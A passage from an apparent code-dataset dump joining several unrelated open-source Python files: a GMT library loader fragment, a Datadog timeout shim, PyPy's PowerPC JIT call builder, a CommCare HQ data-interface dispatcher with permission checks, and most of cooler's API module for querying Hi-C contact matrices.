)
assert libfullpath.exists()
yield str(libfullpath)
except (FileNotFoundError, AssertionError, sp.CalledProcessError):
# the 'gmt' executable is not found
# the gmt library is not found
# the 'gmt' executable is broken
pass
# 3. Search for DLLs in PATH by calling find_library() (Windows only)
if sys.platform == "win32":
for libname in libnames:
libfullpath = find_library(libname)
if libfullpath:
yield libfullpath
# 4. Search for library names in the system default path
for libname in libnames:
yield libname
def check_libgmt(libgmt):
"""
Make sure that libgmt was loaded correctly.
Checks if it defines some common required functions.
Does nothing if everything is fine. Raises an exception if any of the
functions are missing.
Parameters
----------
libgmt : :py:class:`ctypes.CDLL`
A shared library loaded using ctypes.
Raises
------
GMTCLibError
"""
# Check if a few of the functions we need are in the library
functions = ["Create_Session", "Get_Enum", "Call_Module", "Destroy_Session"]
for func in functions:
if not hasattr(libgmt, "GMT_" + func):
# pylint: disable=protected-access
msg = (
f"Error loading '{libgmt._name}'. Couldn't access function GMT_{func}. "
"Ensure that you have installed an up-to-date GMT version 6 library. "
"Please set the environment variable 'GMT_LIBRARY_PATH' to the "
"directory of the GMT 6 library."
)
raise GMTCLibError(msg)
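# Minimal illustrative sketch (not part of the module): show which library
# names would be searched on this platform and attempt to load libgmt.
# Loading only succeeds if a GMT 6 installation is actually present.
if __name__ == "__main__":
    print(clib_names(sys.platform))  # e.g. ['libgmt.so'] on Linux
    try:
        print("loaded:", load_libgmt())
    except GMTCLibNotFoundError as exc:
        print("GMT library not found:", exc)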
|
utils/timeout.py | Mattlk13/dd-agent | 1,172 | 11086822 | <gh_stars>1000+
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from datadog_checks.utils.timeout import (  # noqa: F401
TimeoutException,
ThreadMethod,
timeout
)
|
rpython/jit/backend/ppc/callbuilder.py | m4sterchain/mesapy | 381 | 11086830 | <gh_stars>100-1000
from rpython.jit.backend.ppc.arch import IS_PPC_64, WORD, PARAM_SAVE_AREA_OFFSET
from rpython.jit.backend.ppc.arch import THREADLOCAL_ADDR_OFFSET
import rpython.jit.backend.ppc.register as r
from rpython.jit.metainterp.history import INT, FLOAT
from rpython.jit.backend.llsupport.callbuilder import AbstractCallBuilder
from rpython.jit.backend.ppc.jump import remap_frame_layout
from rpython.rlib.objectmodel import we_are_translated
from rpython.jit.backend.llsupport import llerrno
from rpython.rtyper.lltypesystem import rffi
def follow_jump(addr):
# xxx implement me
return addr
class CallBuilder(AbstractCallBuilder):
GPR_ARGS = [r.r3, r.r4, r.r5, r.r6, r.r7, r.r8, r.r9, r.r10]
FPR_ARGS = r.MANAGED_FP_REGS
assert FPR_ARGS == [r.f1, r.f2, r.f3, r.f4, r.f5, r.f6, r.f7,
r.f8, r.f9, r.f10, r.f11, r.f12, r.f13]
RSHADOWPTR = r.RCS1
RFASTGILPTR = r.RCS2
RSHADOWOLD = r.RCS3
def __init__(self, assembler, fnloc, arglocs, resloc):
AbstractCallBuilder.__init__(self, assembler, fnloc, arglocs,
resloc, restype=INT, ressize=None)
def prepare_arguments(self):
assert IS_PPC_64
self.subtracted_to_sp = 0
# Prepare arguments. Note that this follows the convention where
# a prototype is in scope, and doesn't take "..." arguments. If
# you were to call a C function with a "..." argument with cffi,
# it would not go there but instead via libffi. If you pretend
# instead that it takes fixed arguments, then it would arrive here
# but the convention is bogus for floating-point arguments. (And,
# to add to the mess, at least CPython's ctypes cannot be used
# to call a "..." function with floating-point arguments. As I
# guess that it's a problem with libffi, it means PyPy inherits
# the same problem.)
arglocs = self.arglocs
num_args = len(arglocs)
non_float_locs = []
non_float_regs = []
float_locs = []
for i in range(min(num_args, 8)):
if arglocs[i].type != FLOAT:
non_float_locs.append(arglocs[i])
non_float_regs.append(self.GPR_ARGS[i])
else:
float_locs.append(arglocs[i])
# now 'non_float_locs' and 'float_locs' together contain the
# locations of the first 8 arguments
if num_args > 8:
# We need to make a larger PPC stack frame, as shown on the
# picture in arch.py. It needs to be 48 bytes + 8 * num_args.
# The new SP back chain location should point to the top of
# the whole stack frame, i.e. jumping over both the existing
            # fixed-size part and the new variable-sized part.
base = PARAM_SAVE_AREA_OFFSET
varsize = base + 8 * num_args
varsize = (varsize + 15) & ~15 # align
self.mc.load(r.SCRATCH2.value, r.SP.value, 0) # SP back chain
self.mc.store_update(r.SCRATCH2.value, r.SP.value, -varsize)
self.subtracted_to_sp = varsize
# In this variable-sized part, only the arguments from the 8th
# one need to be written, starting at SP + 112
for n in range(8, num_args):
loc = arglocs[n]
if loc.type != FLOAT:
# after the 8th argument, a non-float location is
# always stored in the stack
if loc.is_reg():
src = loc
else:
src = r.r2
self.asm.regalloc_mov(loc, src)
self.mc.std(src.value, r.SP.value, base + 8 * n)
else:
# the first 13 floating-point arguments are all passed
# in the registers f1 to f13, independently on their
# index in the complete list of arguments
if len(float_locs) < len(self.FPR_ARGS):
float_locs.append(loc)
else:
if loc.is_fp_reg():
src = loc
else:
src = r.FP_SCRATCH
self.asm.regalloc_mov(loc, src)
self.mc.stfd(src.value, r.SP.value, base + 8 * n)
# We must also copy fnloc into FNREG
non_float_locs.append(self.fnloc)
non_float_regs.append(self.mc.RAW_CALL_REG)
if float_locs:
assert len(float_locs) <= len(self.FPR_ARGS)
remap_frame_layout(self.asm, float_locs,
self.FPR_ARGS[:len(float_locs)],
r.FP_SCRATCH)
remap_frame_layout(self.asm, non_float_locs, non_float_regs,
r.SCRATCH)
def push_gcmap(self):
# we push *now* the gcmap, describing the status of GC registers
# after the rearrangements done just before, ignoring the return
# value r3, if necessary
assert not self.is_call_release_gil
noregs = self.asm.cpu.gc_ll_descr.is_shadow_stack()
gcmap = self.asm._regalloc.get_gcmap([r.r3], noregs=noregs)
self.asm.push_gcmap(self.mc, gcmap, store=True)
def pop_gcmap(self):
ssreg = None
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
if gcrootmap.is_shadow_stack and self.is_call_release_gil:
# in this mode, RSHADOWOLD happens to contain the shadowstack
# top at this point, so reuse it instead of loading it again
ssreg = self.RSHADOWOLD
self.asm._reload_frame_if_necessary(self.mc, shadowstack_reg=ssreg)
def emit_raw_call(self):
self.mc.raw_call()
def restore_stack_pointer(self):
if self.subtracted_to_sp != 0:
self.mc.addi(r.SP.value, r.SP.value, self.subtracted_to_sp)
def load_result(self):
assert (self.resloc is None or
self.resloc is r.r3 or
self.resloc is r.f1)
def call_releasegil_addr_and_move_real_arguments(self, fastgil):
assert self.is_call_release_gil
RSHADOWPTR = self.RSHADOWPTR
RFASTGILPTR = self.RFASTGILPTR
RSHADOWOLD = self.RSHADOWOLD
#
# Save this thread's shadowstack pointer into r29, for later comparison
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
if gcrootmap.is_shadow_stack:
rst = gcrootmap.get_root_stack_top_addr()
self.mc.load_imm(RSHADOWPTR, rst)
self.mc.load(RSHADOWOLD.value, RSHADOWPTR.value, 0)
#
# change 'rpy_fastgil' to 0 (it should be non-zero right now)
self.mc.load_imm(RFASTGILPTR, fastgil)
self.mc.li(r.r0.value, 0)
self.mc.lwsync()
self.mc.std(r.r0.value, RFASTGILPTR.value, 0)
#
if not we_are_translated(): # for testing: we should not access
self.mc.addi(r.SPP.value, r.SPP.value, 1) # r31 any more
def move_real_result_and_call_reacqgil_addr(self, fastgil):
from rpython.jit.backend.ppc.codebuilder import OverwritingBuilder
# try to reacquire the lock. The following registers are still
# valid from before the call:
RSHADOWPTR = self.RSHADOWPTR # r30: &root_stack_top
RFASTGILPTR = self.RFASTGILPTR # r29: &fastgil
RSHADOWOLD = self.RSHADOWOLD # r28: previous val of root_stack_top
# Equivalent of 'r10 = __sync_lock_test_and_set(&rpy_fastgil, 1);'
self.mc.li(r.r9.value, 1)
retry_label = self.mc.currpos()
self.mc.ldarx(r.r10.value, 0, RFASTGILPTR.value) # load the lock value
self.mc.stdcxx(r.r9.value, 0, RFASTGILPTR.value) # try to claim lock
self.mc.bc(6, 2, retry_label - self.mc.currpos()) # retry if failed
self.mc.isync()
self.mc.cmpdi(0, r.r10.value, 0)
b1_location = self.mc.currpos()
self.mc.trap() # boehm: patched with a BEQ: jump if r10 is zero
# shadowstack: patched with BNE instead
if self.asm.cpu.gc_ll_descr.gcrootmap:
# When doing a call_release_gil with shadowstack, there
# is the risk that the 'rpy_fastgil' was free but the
# current shadowstack can be the one of a different
# thread. So here we check if the shadowstack pointer
# is still the same as before we released the GIL (saved
# in RSHADOWOLD), and if not, we fall back to 'reacqgil_addr'.
self.mc.load(r.r9.value, RSHADOWPTR.value, 0)
self.mc.cmpdi(0, r.r9.value, RSHADOWOLD.value)
bne_location = b1_location
b1_location = self.mc.currpos()
self.mc.trap()
# revert the rpy_fastgil acquired above, so that the
# general 'reacqgil_addr' below can acquire it again...
# (here, r10 is conveniently zero)
self.mc.std(r.r10.value, RFASTGILPTR.value, 0)
pmc = OverwritingBuilder(self.mc, bne_location, 1)
pmc.bne(self.mc.currpos() - bne_location)
pmc.overwrite()
#
# Yes, we need to call the reacqgil() function.
# save the result we just got
RSAVEDRES = RFASTGILPTR # can reuse this reg here
reg = self.resloc
if reg is not None:
if reg.is_core_reg():
self.mc.mr(RSAVEDRES.value, reg.value)
elif reg.is_fp_reg():
self.mc.stfd(reg.value, r.SP.value,
PARAM_SAVE_AREA_OFFSET + 7 * WORD)
self.mc.load_imm(self.mc.RAW_CALL_REG, self.asm.reacqgil_addr)
self.mc.raw_call()
if reg is not None:
if reg.is_core_reg():
self.mc.mr(reg.value, RSAVEDRES.value)
elif reg.is_fp_reg():
self.mc.lfd(reg.value, r.SP.value,
PARAM_SAVE_AREA_OFFSET + 7 * WORD)
# replace b1_location with BEQ(here)
pmc = OverwritingBuilder(self.mc, b1_location, 1)
pmc.beq(self.mc.currpos() - b1_location)
pmc.overwrite()
if not we_are_translated(): # for testing: now we can access
self.mc.addi(r.SPP.value, r.SPP.value, -1) # r31 again
def write_real_errno(self, save_err):
if save_err & rffi.RFFI_READSAVED_ERRNO:
# Just before a call, read '*_errno' and write it into the
# real 'errno'. A lot of registers are free here, notably
# r11 and r0.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r11.value, r.SP.value,
THREADLOCAL_ADDR_OFFSET + self.subtracted_to_sp)
self.mc.lwz(r.r0.value, r.r11.value, rpy_errno)
self.mc.ld(r.r11.value, r.r11.value, p_errno)
self.mc.stw(r.r0.value, r.r11.value, 0)
elif save_err & rffi.RFFI_ZERO_ERRNO_BEFORE:
# Same, but write zero.
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r11.value, r.SP.value,
THREADLOCAL_ADDR_OFFSET + self.subtracted_to_sp)
self.mc.ld(r.r11.value, r.r11.value, p_errno)
self.mc.li(r.r0.value, 0)
self.mc.stw(r.r0.value, r.r11.value, 0)
def read_real_errno(self, save_err):
if save_err & rffi.RFFI_SAVE_ERRNO:
# Just after a call, read the real 'errno' and save a copy of
# it inside our thread-local '*_errno'. Registers r4-r10
# never contain anything after the call.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r9.value, r.SP.value, THREADLOCAL_ADDR_OFFSET)
self.mc.ld(r.r10.value, r.r9.value, p_errno)
self.mc.lwz(r.r10.value, r.r10.value, 0)
self.mc.stw(r.r10.value, r.r9.value, rpy_errno)
|
corehq/apps/data_interfaces/dispatcher.py | akashkj/commcare-hq | 471 | 11086839 | from django.utils.decorators import method_decorator
from django_prbac.utils import has_privilege
from corehq import privileges
from corehq.apps.accounting.decorators import requires_privilege_with_fallback
from corehq.apps.reports.dispatcher import ReportDispatcher, datespan_default
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
require_can_edit_data = require_permission(Permissions.edit_data)
require_form_management_privilege = requires_privilege_with_fallback(privileges.DATA_CLEANUP)
class EditDataInterfaceDispatcher(ReportDispatcher):
prefix = 'edit_data_interface'
map_name = 'EDIT_DATA_INTERFACES'
@method_decorator(require_can_edit_data)
@datespan_default
def dispatch(self, request, *args, **kwargs):
from corehq.apps.case_importer.base import ImportCases
from .interfaces import BulkFormManagementInterface
if kwargs['report_slug'] == ImportCases.slug:
return self.bulk_import_case_dispatch(request, *args, **kwargs)
elif (kwargs['report_slug'] == BulkFormManagementInterface.slug and
not kwargs.get('skip_permissions_check')):
return self.bulk_form_management_dispatch(request, *args, **kwargs)
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
@method_decorator(requires_privilege_with_fallback(privileges.BULK_CASE_MANAGEMENT))
def bulk_import_case_dispatch(self, request, *args, **kwargs):
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
@method_decorator(require_form_management_privilege)
def bulk_form_management_dispatch(self, request, *args, **kwargs):
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
def permissions_check(self, report, request, domain=None, is_navigation_check=False):
if is_navigation_check:
from corehq.apps.case_importer.base import ImportCases
from corehq.apps.data_interfaces.interfaces import BulkFormManagementInterface
report_name = report.split('.')[-1]
if report_name == ImportCases.__name__:
if not has_privilege(request, privileges.BULK_CASE_MANAGEMENT):
return False
if report_name == BulkFormManagementInterface.__name__:
if not has_privilege(request, privileges.DATA_CLEANUP):
return False
return request.couch_user.can_edit_data(domain)
|
cooler/api.py | mimakaev/cooler | 106 | 11086873 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import simplejson as json
import six
import os
from pandas.api.types import is_integer_dtype
from scipy.sparse import coo_matrix
import numpy as np
import pandas as pd
import h5py
from .core import (
get,
region_to_offset,
region_to_extent,
RangeSelector1D,
RangeSelector2D,
CSRReader,
query_rect,
)
from .util import parse_cooler_uri, parse_region, open_hdf5, closing_hdf5
from .fileops import list_coolers
__all__ = ["Cooler", "annotate"]
# The 4DN data portal and hic2cool store these weight vectors in divisive form
_4DN_DIVISIVE_WEIGHTS = {"KR", "VC", "VC_SQRT"}
class Cooler(object):
"""
A convenient interface to a cooler data collection.
Parameters
----------
store : str, :py:class:`h5py.File` or :py:class:`h5py.Group`
Path to a cooler file, URI string, or open handle to the root HDF5
group of a cooler data collection.
root : str, optional [deprecated]
HDF5 Group path to root of cooler group if ``store`` is a file.
This option is deprecated. Instead, use a URI string of the form
:file:`<file_path>::<group_path>`.
kwargs : optional
Options to be passed to :py:class:`h5py.File()` upon every access.
By default, the file is opened with the default driver and mode='r'.
Notes
-----
    If ``store`` is a file path, the file will be opened temporarily when
    performing operations. This allows :py:class:`Cooler` objects to be
serialized for multiprocess and distributed computations.
Metadata is accessible as a dictionary through the :py:attr:`info`
property.
Table selectors, created using :py:meth:`chroms`, :py:meth:`bins`, and
:py:meth:`pixels`, perform range queries over table rows,
returning :py:class:`pd.DataFrame` and :py:class:`pd.Series`.
A matrix selector, created using :py:meth:`matrix`, performs 2D matrix
range queries, returning :py:class:`numpy.ndarray` or
:py:class:`scipy.sparse.coo_matrix`.
"""
def __init__(self, store, root=None, **kwargs):
if isinstance(store, six.string_types):
if root is None:
self.filename, self.root = parse_cooler_uri(store)
elif h5py.is_hdf5(store):
with open_hdf5(store, **kwargs) as h5:
self.filename = h5.file.filename
self.root = root
else:
raise ValueError("Not a valid path to a Cooler file")
self.uri = self.filename + "::" + self.root
self.store = self.filename
self.open_kws = kwargs
else:
# Assume an open HDF5 handle, ignore open_kws
self.filename = store.file.filename
self.root = store.name
self.uri = self.filename + "::" + self.root
self.store = store.file
self.open_kws = {}
self._refresh()
def _refresh(self):
try:
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
_ct = chroms(grp)
_ct["name"] = _ct["name"].astype(object)
self._chromsizes = _ct.set_index("name")["length"]
self._chromids = dict(zip(_ct["name"], range(len(_ct))))
self._info = info(grp)
mode = self._info.get("storage-mode", u"symmetric-upper")
self._is_symm_upper = mode == u"symmetric-upper"
except KeyError:
err_msg = "No cooler found at: {}.".format(self.store)
listing = list_coolers(self.store)
if len(listing):
err_msg += (
" Coolers found in {}. ".format(listing)
+ "Use '::' to specify a group path"
)
raise KeyError(err_msg)
def _load_dset(self, path):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return grp[path][:]
def _load_attrs(self, path):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return dict(grp[path].attrs)
def open(self, mode="r", **kwargs):
""" Open the HDF5 group containing the Cooler with :py:mod:`h5py`
Functions as a context manager. Any ``open_kws`` passed during
construction are ignored.
Parameters
----------
mode : str, optional [default: 'r']
* ``'r'`` (readonly)
* ``'r+'`` or ``'a'`` (read/write)
Notes
-----
For other parameters, see :py:class:`h5py.File`.
"""
grp = h5py.File(self.filename, mode, **kwargs)[self.root]
return closing_hdf5(grp)
@property
def storage_mode(self):
"""Indicates whether ordinary sparse matrix encoding is used
(``"square"``) or whether a symmetric matrix is encoded by storing only
the upper triangular elements (``"symmetric-upper"``).
"""
return self._info.get("storage-mode", u"symmetric-upper")
@property
def binsize(self):
""" Resolution in base pairs if uniform else None """
return self._info["bin-size"]
@property
def chromsizes(self):
""" Ordered mapping of reference sequences to their lengths in bp """
return self._chromsizes
@property
def chromnames(self):
""" List of reference sequence names """
return list(self._chromsizes.index)
def offset(self, region):
""" Bin ID containing the left end of a genomic region
Parameters
----------
region : str or tuple
Genomic range
Returns
-------
int
Examples
--------
>>> c.offset('chr3') # doctest: +SKIP
1311
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_offset(
grp, self._chromids, parse_region(region, self._chromsizes)
)
def extent(self, region):
""" Bin IDs containing the left and right ends of a genomic region
Parameters
----------
region : str or tuple
Genomic range
Returns
-------
2-tuple of ints
Examples
--------
>>> c.extent('chr3') # doctest: +SKIP
(1311, 2131)
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
@property
def info(self):
""" File information and metadata
Returns
-------
dict
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return info(grp)
@property
def shape(self):
return (self._info["nbins"],) * 2
def chroms(self, **kwargs):
""" Chromosome table selector
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return chroms(grp, lo, hi, fields, **kwargs)
return RangeSelector1D(None, _slice, None, self._info["nchroms"])
def bins(self, **kwargs):
""" Bin table selector
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return bins(grp, lo, hi, fields, **kwargs)
def _fetch(region):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
return RangeSelector1D(None, _slice, _fetch, self._info["nbins"])
def pixels(self, join=False, **kwargs):
""" Pixel table selector
Parameters
----------
join : bool, optional
Whether to expand bin ID columns into chrom, start, and end
columns. Default is ``False``.
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return pixels(grp, lo, hi, fields, join, **kwargs)
def _fetch(region):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
i0, i1 = region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
lo = grp["indexes"]["bin1_offset"][i0]
hi = grp["indexes"]["bin1_offset"][i1]
return lo, hi
return RangeSelector1D(None, _slice, _fetch, self._info["nnz"])
def matrix(
self,
field=None,
balance=True,
sparse=False,
as_pixels=False,
join=False,
ignore_index=True,
divisive_weights=None,
max_chunk=500000000,
):
""" Contact matrix selector
Parameters
----------
field : str, optional
Which column of the pixel table to fill the matrix with. By
default, the 'count' column is used.
balance : bool, optional
Whether to apply pre-calculated matrix balancing weights to the
selection. Default is True and uses a column named 'weight'.
Alternatively, pass the name of the bin table column containing
the desired balancing weights. Set to False to return untransformed
counts.
sparse: bool, optional
Return a scipy.sparse.coo_matrix instead of a dense 2D numpy array.
as_pixels: bool, optional
Return a DataFrame of the corresponding rows from the pixel table
instead of a rectangular sparse matrix. False by default.
join : bool, optional
If requesting pixels, specifies whether to expand the bin ID
columns into (chrom, start, end). Has no effect when requesting a
            rectangular matrix. Default is False.
ignore_index : bool, optional
If requesting pixels, don't populate the index column with the
pixel IDs to improve performance. Default is True.
divisive_weights : bool, optional
Force balancing weights to be interpreted as divisive (True) or
multiplicative (False). Weights are always assumed to be
multiplicative by default unless named KR, VC or SQRT_VC, in which
case they are assumed to be divisive by default.
Returns
-------
Matrix selector
Notes
-----
If ``as_pixels=True``, only data explicitly stored in the pixel table
will be returned: if the cooler's storage mode is symmetric-upper,
lower triangular elements will not be generated. If
``as_pixels=False``, those missing non-zero elements will
automatically be filled in.
"""
if balance in _4DN_DIVISIVE_WEIGHTS and divisive_weights is None:
divisive_weights = True
def _slice(field, i0, i1, j0, j1):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return matrix(
grp,
i0,
i1,
j0,
j1,
field,
balance,
sparse,
as_pixels,
join,
ignore_index,
divisive_weights,
max_chunk,
self._is_symm_upper,
)
def _fetch(region, region2=None):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
if region2 is None:
region2 = region
region1 = parse_region(region, self._chromsizes)
region2 = parse_region(region2, self._chromsizes)
i0, i1 = region_to_extent(grp, self._chromids, region1)
j0, j1 = region_to_extent(grp, self._chromids, region2)
return i0, i1, j0, j1
return RangeSelector2D(field, _slice, _fetch, (self._info["nbins"],) * 2)
def __repr__(self):
if isinstance(self.store, six.string_types):
filename = os.path.basename(self.store)
container = "{}::{}".format(filename, self.root)
else:
container = repr(self.store)
return '<Cooler "{}">'.format(container)
def info(h5):
"""
File and user metadata dict.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
Returns
-------
dict
"""
d = {}
for k, v in h5.attrs.items():
if isinstance(v, six.string_types):
try:
v = json.loads(v)
except ValueError:
pass
d[k] = v
return d
def chroms(h5, lo=0, hi=None, fields=None, **kwargs):
"""
Table describing the chromosomes/scaffolds/contigs used.
They appear in the same order they occur in the heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["name", "length"])
.append(pd.Index(h5["chroms"].keys()))
.drop_duplicates()
)
return get(h5["chroms"], lo, hi, fields, **kwargs)
def bins(h5, lo=0, hi=None, fields=None, **kwargs):
"""
Table describing the genomic bins that make up the axes of the heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["chrom", "start", "end"])
.append(pd.Index(h5["bins"].keys()))
.drop_duplicates()
)
# If convert_enum is not explicitly set to False, chrom IDs will get
# converted to categorical chromosome names, provided the ENUM header
# exists in bins/chrom. Otherwise, they will return as integers.
out = get(h5["bins"], lo, hi, fields, **kwargs)
# Handle the case where the ENUM header doesn't exist but we want to
# convert integer chrom IDs to categorical chromosome names.
if "chrom" in fields:
convert_enum = kwargs.get("convert_enum", True)
if isinstance(fields, six.string_types):
chrom_col = out
else:
chrom_col = out["chrom"]
if is_integer_dtype(chrom_col.dtype) and convert_enum:
chromnames = chroms(h5, fields="name")
chrom_col = pd.Categorical.from_codes(chrom_col, chromnames, ordered=True)
if isinstance(fields, six.string_types):
out = pd.Series(chrom_col, out.index)
else:
out["chrom"] = chrom_col
return out
def pixels(h5, lo=0, hi=None, fields=None, join=True, **kwargs):
"""
Table describing the nonzero upper triangular pixels of the Hi-C contact
heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
join : bool, optional
Whether or not to expand bin ID columns to their full bin description
(chrom, start, end). Default is True.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["bin1_id", "bin2_id"])
.append(pd.Index(h5["pixels"].keys()))
.drop_duplicates()
)
df = get(h5["pixels"], lo, hi, fields, **kwargs)
if join:
bins = get(h5["bins"], 0, None, ["chrom", "start", "end"], **kwargs)
df = annotate(df, bins, replace=True)
return df
def annotate(pixels, bins, replace=False):
"""
Add bin annotations to a data frame of pixels.
This is done by performing a relational "join" against the bin IDs of a
table that describes properties of the genomic bins. New columns will be
appended on the left of the output data frame.
.. versionchanged:: 0.8.0
The default value of ``replace`` changed to False.
Parameters
----------
pixels : :py:class:`DataFrame`
A data frame containing columns named ``bin1_id`` and/or ``bin2_id``.
If columns ``bin1_id`` and ``bin2_id`` are both present in ``pixels``,
the adjoined columns will be suffixed with '1' and '2' accordingly.
bins : :py:class:`DataFrame` or DataFrame selector
Data structure that contains a full description of the genomic bins of
the contact matrix, where the index corresponds to bin IDs.
replace : bool, optional
Remove the original ``bin1_id`` and ``bin2_id`` columns from the
output. Default is False.
Returns
-------
:py:class:`DataFrame`
"""
columns = pixels.columns
ncols = len(columns)
if "bin1_id" in columns:
if len(bins) > len(pixels):
bin1 = pixels["bin1_id"]
lo = bin1.min()
hi = bin1.max() + 1
lo = 0 if np.isnan(lo) else lo
hi = 0 if np.isnan(hi) else hi
right = bins[lo:hi]
else:
right = bins[:]
pixels = pixels.merge(right, how="left", left_on="bin1_id", right_index=True)
if "bin2_id" in columns:
if len(bins) > len(pixels):
bin2 = pixels["bin2_id"]
lo = bin2.min()
hi = bin2.max() + 1
lo = 0 if np.isnan(lo) else lo
hi = 0 if np.isnan(hi) else hi
right = bins[lo:hi]
else:
right = bins[:]
pixels = pixels.merge(
right, how="left", left_on="bin2_id", right_index=True, suffixes=("1", "2")
)
# rearrange columns
pixels = pixels[list(pixels.columns[ncols:]) + list(pixels.columns[:ncols])]
# drop bin IDs
if replace:
cols_to_drop = [col for col in ("bin1_id", "bin2_id") if col in columns]
pixels = pixels.drop(cols_to_drop, axis=1)
return pixels
def matrix(
h5,
i0,
i1,
j0,
j1,
field=None,
balance=True,
sparse=False,
as_pixels=False,
join=True,
ignore_index=True,
divisive_weights=False,
max_chunk=500000000,
is_upper=True,
):
"""
Two-dimensional range query on the Hi-C contact heatmap.
Depending on the options, returns either a 2D NumPy array, a rectangular
sparse ``coo_matrix``, or a data frame of pixels.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
i0, i1 : int, optional
        Bin range along the 0th (row) axis of the heatmap.
j0, j1 : int, optional
        Bin range along the 1st (col) axis of the heatmap.
field : str, optional
Which column of the pixel table to fill the matrix with. By default,
the 'count' column is used.
balance : bool, optional
Whether to apply pre-calculated matrix balancing weights to the
selection. Default is True and uses a column named 'weight'.
Alternatively, pass the name of the bin table column containing the
desired balancing weights. Set to False to return untransformed counts.
sparse: bool, optional
Return a scipy.sparse.coo_matrix instead of a dense 2D numpy array.
as_pixels: bool, optional
Return a DataFrame of the corresponding rows from the pixel table
instead of a rectangular sparse matrix. False by default.
join : bool, optional
If requesting pixels, specifies whether to expand the bin ID columns
into (chrom, start, end). Has no effect when requesting a rectangular
matrix. Default is True.
ignore_index : bool, optional
If requesting pixels, don't populate the index column with the pixel
IDs to improve performance. Default is True.
Returns
-------
ndarray, coo_matrix or DataFrame
Notes
-----
If ``as_pixels=True``, only data explicitly stored in the pixel table
will be returned: if the cooler's storage mode is symmetric-upper,
lower triangular elements will not be generated. If ``as_pixels=False``,
those missing non-zero elements will automatically be filled in.
"""
if field is None:
field = "count"
if isinstance(balance, str):
name = balance
elif balance:
name = "weight"
if balance and name not in h5["bins"]:
raise ValueError(
"No column 'bins/{}'".format(name)
+ "found. Use ``cooler.balance_cooler`` to "
+ "calculate balancing weights or set balance=False."
)
if as_pixels:
reader = CSRReader(h5, field, max_chunk)
index = None if ignore_index else reader.index_col(i0, i1, j0, j1)
i, j, v = reader.query(i0, i1, j0, j1)
cols = ["bin1_id", "bin2_id", field]
df = pd.DataFrame(dict(zip(cols, [i, j, v])), columns=cols, index=index)
if balance:
weights = Cooler(h5).bins()[[name]]
df2 = annotate(df, weights, replace=False)
if divisive_weights:
df2[name + "1"] = 1 / df2[name + "1"]
df2[name + "2"] = 1 / df2[name + "2"]
df["balanced"] = df2[name + "1"] * df2[name + "2"] * df2[field]
if join:
bins = Cooler(h5).bins()[["chrom", "start", "end"]]
df = annotate(df, bins, replace=True)
return df
elif sparse:
reader = CSRReader(h5, field, max_chunk)
if is_upper:
i, j, v = query_rect(reader.query, i0, i1, j0, j1, duplex=True)
else:
i, j, v = reader.query(i0, i1, j0, j1)
mat = coo_matrix((v, (i - i0, j - j0)), (i1 - i0, j1 - j0))
if balance:
weights = h5["bins"][name]
bias1 = weights[i0:i1]
bias2 = bias1 if (i0, i1) == (j0, j1) else weights[j0:j1]
if divisive_weights:
bias1 = 1 / bias1
bias2 = 1 / bias2
mat.data = bias1[mat.row] * bias2[mat.col] * mat.data
return mat
else:
reader = CSRReader(h5, field, max_chunk)
if is_upper:
